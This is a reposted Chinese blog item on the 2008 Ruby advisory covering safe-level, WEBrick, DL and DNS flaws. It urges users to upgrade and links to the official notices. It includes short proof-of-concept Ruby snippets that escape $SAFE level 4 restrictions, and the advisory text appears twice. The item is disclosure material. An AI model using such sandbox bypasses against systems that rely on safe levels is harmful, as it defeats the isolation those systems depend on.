Ruby解释器及其API库发现众多安全缺陷
程序员文章站
2022-05-18 20:57:40
...
Ruby上众多安全缺陷被发现,Safe Level、WEBrick、Dl和DNS查找都受到影响。Ruby官方网站建议使用者尽快将Ruby升级到最新版本。安全缺陷包括:
untrace_var is permitted at safe level 4.
$PROGRAM_NAME may be modified at safe level 4.
Insecure methods may be called at safe level 1-3.
Syslog operations are permitted at safe level 4.
其中WEBrick中发现的安全缺陷可能导致DoS攻击。具体情况见http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/
才发现Ruby官方网还有中文版的:http://www.ruby-lang.org/zh_CN/news/2008/08/08/multiple-vulnerabilities-in-ruby
untrace_var is permitted at safe level 4.
trace_var(:$VAR) {|val| puts "$VAR = #{val}" }
Thread.new do
$SAFE = 4
eval %q{
proc = untrace_var :$VAR
proc.first.call("aaa")
}
end.join
$PROGRAM_NAME may be modified at safe level 4.
Thread.new do
$SAFE = 4
eval %q{$PROGRAM_NAME.replace "Hello, World!"}
end.join
$PROGRAM_NAME #=> "Hello, World!"
Insecure methods may be called at safe level 1-3.
class Hello
def world
Thread.new do
$SAFE = 4
msg = "Hello, World!"
def msg.size
self.replace self*10 # replace string
1 # return wrong size
end
msg
end.value
end
end
$SAFE = 1 # or 2, or 3
s = Hello.new.world
if s.kind_of?(String)
puts s if s.size < 20 # print string which size is less than 20
end
Syslog operations are permitted at safe level 4.
require "syslog"
Syslog.open
Thread.new do
$SAFE = 4
eval %q{
Syslog.log(Syslog::LOG_WARNING, "Hello, World!")
Syslog.mask = Syslog::LOG_UPTO(Syslog::LOG_EMERG)
Syslog.info("masked")
Syslog.close
}
end.join
其中WEBrick中发现的安全缺陷可能导致DoS攻击。具体情况见http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/
才发现Ruby官方网还有中文版的:http://www.ruby-lang.org/zh_CN/news/2008/08/08/multiple-vulnerabilities-in-ruby
上一篇: MySQL 主从复制问题
下一篇: day17